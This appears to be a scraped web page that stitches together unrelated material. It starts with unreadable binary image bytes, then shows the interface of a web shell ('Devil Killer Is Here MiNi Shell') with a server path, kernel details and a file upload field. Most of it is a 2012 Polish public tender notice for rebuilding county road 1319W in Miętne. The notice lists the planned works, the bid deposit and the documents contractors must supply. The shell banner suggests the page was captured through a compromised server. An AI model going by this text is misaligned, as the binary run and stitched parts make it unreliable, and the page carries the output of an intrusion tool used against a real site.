JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120113/13509-N-2012.html

<p class="kh_header"><b>Wola Rębkowska: Przebudowa drogi powiatowej Nr 1319W Wola Rębkowska - Miętne - Stary Puznów w km 3+050 ÷ 3+742 w m. Miętne</b><br>
<b>Numer ogłoszenia: 13509 - 2012; data zamieszczenia: 13.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Garwolinie , ul. Przemysłowa 45, 08-410 Wola Rębkowska, woj. mazowieckie, tel. 025 6822215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 1319W Wola Rębkowska - Miętne - Stary Puznów w km 3+050 ÷ 3+742 w m. Miętne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie przebudowy drogi powiatowej Nr 1319W Wola Rębkowska - Miętne - Stary Puznów w km 3+050 ÷ 3+742 w m. Miętne.

Przebudowa drogi obejmuje następujące roboty:

1.	ROBOTY PRZYGOTOWAWCZE
Odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych (drogi) w terenie równinnym na długości 692 m,
Karczowanie drzew o średnicy 66-75 cm (mechaniczne ścinanie drzew z karczowaniem pni) w ilości 1 szt.,
Wywóz dłużyc z transportem na odległość do 2 km w ilości 1,51 m3,
Transport dłużyc na dalsze 3 km w ilości 1,51 m3,
Wywóz gałęzi z transportem na odległość do 2 km w ilości 2 m3,
Transport gałęzi na dalsze 3 km w ilości 2 m3,
Mechaniczne karczowanie pni o średnicy 56-65 cm w ilości 3 szt.,
Wywóz karpiny, transport na odległość do 2 km w ilości 2 m3,
Transport karpiny na dalsze 3 km w ilości 2 m3,
Rozebranie przepustów z rur żelbetowych O 60 w ilości 12 m,
Rozebranie ścianek czołowych przepustów z rur żelbetowych O60 w ilości 1,92 m3,
Rozebranie nawierzchni z mieszanek min.-bit. gr. 3 cm w ilości 12,4 m2,
Rozebranie nawierzchni z mieszanek min.-bit. za dalsze 2 cm grubości w ilości 12,4 m2,
Mechaniczne rozebranie nawierzchni z brukowca o wys. brukowca 13-17 cm w ilości 12,4 m2.
2.	ODWODNIENIE
Wykonanie ławy fundamentowej betonowej z betonu B-10 pod przepust w ilości 1,44 m3,
Ułożenie przepustów z rur żelbetowych pod koroną drogi, rury o średnicy O60 w ilości 12 m,
Wykonanie ścianek czołowych przepustu O60 w ilości 1,92 m3,
Oczyszczenie rowów z namułu gł. 20 cm z profilowaniem skarp rowu w ilości 1192 m,
Transport gruntu kat. III z renowacji rowu na odkład na odległość 1 km w ilości 95,36 m3, 
Transport gruntu kat. III z renowacji rowu - na dalsze 4 km w ilości 95,36 m3
Wykonanie studni rewizyjnych przelotowych o średnicy O1200 mm w ilości 3 szt
Mechaniczne rozebranie nawierzchni z mieszanek min.-bit. gr. 3 cm w ilości 112,5 m2
Rozebranie nawierzchni z mieszanek min.-bit. za dalsze 2 cm w ilości 112,5 m2
Mechaniczne rozebranie podbudowy z kruszywa łamanego o gr. 15 cm w ilości 112,5 m2
Rozebranie podbudowy z kruszywa łamanego za dalsze 5 cm grubości w ilości 112,5 m2
Wykopy liniowe lub jamiste ze skarpami, o szerokości dna do 1,5 m i gł. do 1,5 m w gr. kat. III w ilości 168,75 m3
Transport gruntu kat. III z wykopu na odkład na odległość do 1 km w ilości 168,75 m3
Transport gruntu kat. III z wykopu na dalsze 4 km w ilości 168,75 m3
Podłoże betonowe z betonu B-10 gr. 20 cm pod kolektor O 40 w ilości 30 m2
Wykonanie kolektora z rur betonowych WIPRO O 40 w ilości 75 m
Zasypanie kolektora gruntem kat. II (pospółka) z ubiciem warstwami co 20 cm w ilości 135 m3

3.	PODBUDOWA
Wykonanie podbudowy z kruszywa łamanego, w-wa dolna, gr. w-wy 20 cm w ilości 125,5 m2
Wykonanie podbudowy z betonu asfaltowego, wg PN-EN, gr. w-wy 7 cm, KR-3 w ilości 125,5 m2
Wyrównanie profilu istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-3 w ilości 264,72 Mg
4.	NAWIERZCHNIA
Oczyszczenie warstw konstrukcyjnych mechaniczne (istniejącej naw. bit.) w ilości 4271,4 m2
Skropienie warstw konstrukcyjnych emulsją asfaltową. w ilości 4271,4 m2
Wykonanie nawierzchni z betonu asfaltowego, w-wa wiążąca, gr. w-wy 6 cm, KR-3 w ilości 125,5 m2
Wykonanie nawierzchni z betonu asfaltowego wg PN-EN, w-wa ścieralna, gr. w-wy 5 cm, KR-3 w ilości 4271,4 m2
5.	POBOCZA
Uzupełnienie poboczy kruszywem łamanym śr. gr. 8 cm wraz z zagęszczeniem ilości 715 m2
6.	ZJAZDY GOSPODARCZE
Rozebranie przepustów z rur betonowych O 40 w ilości 50 m
Ręczne wykonanie koryta gł. 20 cm w gr. kat. III z tr. gruntu na odl. do 1 km w ilości 278,4 m2
Ławy fundamentowe betonowe pod przepustami w ilości 5,76 m3
Ułożenie przepustów O 40 pod zjazdami 72 m
Wykonanie podbudowy z tłucznia gr. 15 cm w ilości 278,4 m2
Wykonanie nawierzchni z betonu asfaltowego wg PN-EN, w-wa ścieralna, gr. w-wy 5 cm, KR-2 w ilości 417,6 m2
Rozebranie zjazdów z kostki brukowej betonowej gr. 8 cm w ilości 120 m2
Ułożenie kostki brukowej betonowej (kostka z odzysku) na podsypce cem.-piask. w ilości 120 m2
7.	OZNAKOWANIE PIONOWE I POZIOME
Ustawienie słupków z rur stalowych ocynkowanych dla znaków drogowych w ilości 8 szt
Przymocowanie tarcz znaków drogowych odblaskowych do gotowych słupków w ilości 8 szt
Oznakowanie poziome jezdni materiałami grubowarstwowymi (przejścia dla pieszych) w ilości 12 m2
Oznakowanie poziome jezdni materiałami grubowarstwowymi w ilości 63,68 m2
Punktowe elementy odblaskowe (białe) w ilości 70 szt
8.	URZĄDZENIA BEZPIECZEŃSTWA RUCHU DROGOWEGO
Bariera ochronna typ Olsztyński w ilości 28,8 m
Oświetlenie przejścia dla pieszych lampami z zastosowaniem zasady kontrastu dodatniego w ilości 1 kpl
Płyty ostrzegawcze typu BRAJL w ilości 16 szt
9.	ELEMENTY ULIC
Rozebranie chodników z płyt betonowych o wym. 50x50x7 w ilości 1052 m2
Wywiezienie gruzu na odl. do 1 km w ilości 73,64 m3
Transport gruzu na dalsze 9 km w ilości 73,64 m3
Rozebranie krawężników betonowych o wym. 15x30 w ilości 606 m
Wywiezienie gruzu na odl. do 1 km w ilości w ilości 27,27 m3
Transport gruzu na dalsze 9 km w ilości 27,27 m3
Rozebranie obrzeży betonowych o wym. 8x30 cm w ilości 526 m
Wywiezienie gruzu na odl. do 1 km w ilości 12,62 m3
Wywiezienie gruzu na dalsze 9 km w ilości 12,62 m3
Ustawienie obrzeży betonowych o wym. 8x30 na podsypce cem.-piask. w ilości 526 m
Ustawienie krawężników betonowych wystających o wym. 15x30 cm na ławie betonowej z oporem w ilości 606 m
Mechaniczne wykonanie koryta gł. 20 cm w gr. kat. III pod chodnik z tr. gruntu na odl. do 1 km w ilości 1052 m2
Wykonanie warstwy odsączającej z piasku, gr. w-wy 10 cm w ilości 1052 m2
Wykonanie podbudowy z kruszywa łamanego, w-wa górna, gr. w-wy 10 cm w ilości 1052 m2
Wykonanie chodnika z kostki brukowej betonowej szarej gr. 8 cm na podsypce cem.-piask. gr. 3 cm w ilości 1052 m2
Wykonanie ścieku z rur betonowych kielichowych O10 w ilości 36 m
Regulacja pionowa studzienek dla urządzeń podziemnych - studzienki telefoniczne w ilości 12 szt

10.	ZJAZDY PRZEZ CHODNIK
Rozebranie przepustów rurowych betonowych O 40 w ilości 80 m
Rozebranie nawierzchni z płyt drogowych betonowych (trylinki) w ilości 360 m2
Wywiezienie gruzu na odl. do 1 km w ilości 65,81 m3
Wywiezienie gruzu na dalsze 9 km w ilości 65,81 m3
Wykonanie koryta mechaniczne wraz z profilowaniem i zagęszczeniem podłoża w gr. kat. III, gł. koryta 20 cm z tr. gruntu na odl. do 1 km w ilości 400 m2
Wykonanie koryta mechaniczne w gr. kat. III za dalsze 15 cm gł. koryta z tr. gruntu na odl. do 1 km w ilości 400 m2
Wykonanie ławy betonowej gr. 15 cm pod przepusty w ilości w ilości 5,76 m3
Ułożenie przepustów rurowych betonowych O40 w ilości 96 m
Wykonanie ścianek czołowych przepustu O40 pod zjazdami w ilości 32 szt
Ustawienie krawężników betonowych o wym. 15x30 na ławie betonowej bez oporu w ilości 176 m
Wykonanie warstwy odsączającej z piasku, gr. w-wy 10 cm w ilości 400 m2
Wykonanie podbudowy z chudego betonu, gr. w-wy 12 cm w ilości 400 m2
Wykonanie podbudowy z chudego betonu, za dalsze 3 cm grubości w ilości 400 m2
Wykonanie wjazdów i wyjazdów z kostki brukowej betonowej kolorowej gr. 8 cm na podsypce cem.-piask. gr. 3 cm w ilości 400 m2
11.	ZATOKA AUTOBUSOWA
Wykonanie wykopu mechaniczne w gr. kat. III z transportem urobku na odkład na odl. do 1 km w ilości 56 m3
Transport urobku kat. III na dalsze 4 km w ilości 56 m3
Podłoże betonowe B-10 gr. 20 cm pod kolektor O 40 w ilości 30 m2
Wykonanie rowu krytego z rur betonowych O 40 w ilości 50 m
Ustawienie krawężników betonowych o wym. 15x30 na lawie betonowej z oporem w ilości 56 m
Ustawienie obrzeży betonowych o wym. 30x8 na podsypce cem.-piask. w ilości 6 m
Wykonanie warstwy odsączającej z piasku w ilości 125 m2
Wykonanie podbudowy z kruszywa naturalnego (pospółki) przy gr. 10 cm w ilości 30 m2
Wykonanie nawierzchni z kostki brukowej betonowej gr. 6 cm, szarej na podsypce cem.-piask. gr. 3 cm w ilości 30 m2
Wykonanie podbudowy z betonu B-20 w ilości 125 m2 gr. 20 cm
Wykonanie nawierzchni z kostki brukowej betonowej gr. 8 cm na podsypce cem.-piask. gr. 3 cm w ilości 125 m2

12.	ZJAZDY NA DROGI BOCZNE
Rozebranie nawierzchni z mieszanek min.-bit. gr. 3 cm w ilości 32 m2
Mechaniczne rozebranie podbudowy z kruszywa kamiennego gr. 15 cm w ilości 32 m2
Mechaniczne rozebranie podbudowy z kruszywa łamanego za dalsze 5 cm grubości w ilości 32 m2
Rozebranie przepustów rurowych z rur betonowych O 40 w ilości 28 m
Ułożenie przepustów z rur betonowych O 40 na ławie betonowej gr. 20 cm w ilości 28 m
Wykonanie ścianek czołowych przepustów O 40 w ilości 4 szt
Wykonanie warstwy odsączającej z piasku gr. 30 cm na przepuście w ilości 44 m2
Wykonanie podbudowy z kruszywa łamanego gr. 20 cm w ilości 162,96 m2
Wykonanie nawierzchni z betonu asfaltowego wg PN-EN, w-wa ścieralna, KR-2 
w ilości 327,4 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 10 975,61PLN (słownie; dziesięć tysięcy dziewięćset siedemdziesiąt pięć złotych  61/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku wiedzy i doświadczenia Zamawiający uzna wykaz robót budowlanych, wykonanych w okresie ostatnich 5-ciu lat tj. 2007/2008/2009/2010/2011r. przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót drogowych (w tym; roboty przygotowawcze, odwodnienie, podbudowa, nawierzchnia, pobocza, zjazdy gospodarcze, oznakowanie pionowe i poziomem, urządzenia bezpieczeństwa ruchu, elementy ulic, zjazdy przez chodnik, zatoki autobusowe, zjazdy na drogi boczne) o wartości nie mniejszej niż 700 000,00zł brutto każda  z podaniem ich rodzaju i wartości, daty i miejsca wykonania  (załącznik Nr 5) wraz z referencjami od poprzednich zamawiających potwierdzające, że roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim  potencjałem technicznym  do realizacji zamówienia, Zamawiający uzna, że Wykonawca  posiada lub będzie dysponował jednostkami sprzętu wraz z informacją o podstawie dysponowania tymi zasobami. przewidzianego do wykonania zamówienia - na załączonym formularzu - załącznik Nr 4 - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców * Wytwórnia mas bitumicznych  o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek  mineralno-asfaltowych- szt. 1 (dopuszcza się zakup mieszanki mineralno-asfaltowej, w tym przypadku należy podać źródło zakupu),  Układarka do mas bitumicznych z automatycznym sterowaniem i podgrzewaną deską - typu zagęszczającego -szt1, Walec ogumiony z regulacją ciśnienia kół oraz fartuchem osłonowym - szt. 1, Walce stalowe 8- l0 Mg i 11-14 Mg - szt. 1+1, Urządzenie do oczyszczania nawierzchni - szt. 1, Samochody samowyładowcze z przykryciem w czasie transportu i podczas oczekiwania na rozładunek - w ilości zapewniającej ciągłość robót, Skrapiarka samochodowa z urządzeniem do mechanicznego sterowania i dozowania lepiszcza - szt. 1, piła do cięcia kostki -szt. 1., piła wibracyjna  -szt. 1,koparko-ładowarka - szt. 1,piła mechaniczna- szt. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonywania zamówienia, Zamawiający uzna dysponowanie osobami - Kierownik robót posiadającymi uprawnienia budowlane do kierowania robotami drogowymi (minimum jedna osoba), laborant (minimum jedna osoba), ,majster robót bitumicznych   (minimum jedna osoba), operator układarki, (minimum jedna osoba),  operator walca (minimum dwie osoby),, operator skrapiarki, (minimum jedna osoba), Operator piły do cięcia kostki  (minimum jedna osoba),  Operator piły wibracyjnej (minimum jedna osoba), operator koparko-ładowarki, (minimum jedna osoba),  operator piły mechanicznej (minimum jedna osoba), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi  osobami. na załączonym formularzu - załącznik Nr 3, wraz z oświadczeniami, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej, Zamawiający uzna 
1. Oświadczenie, że Wykonawca dysponuje środkami finansowymi w kwocie 735 000,00zł  niezbędnymi do wykonania zamówienia na załączniku Nr 2
2. posiadanie  opłaconej polisy  opiewającej na kwotę 50 000,00  lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
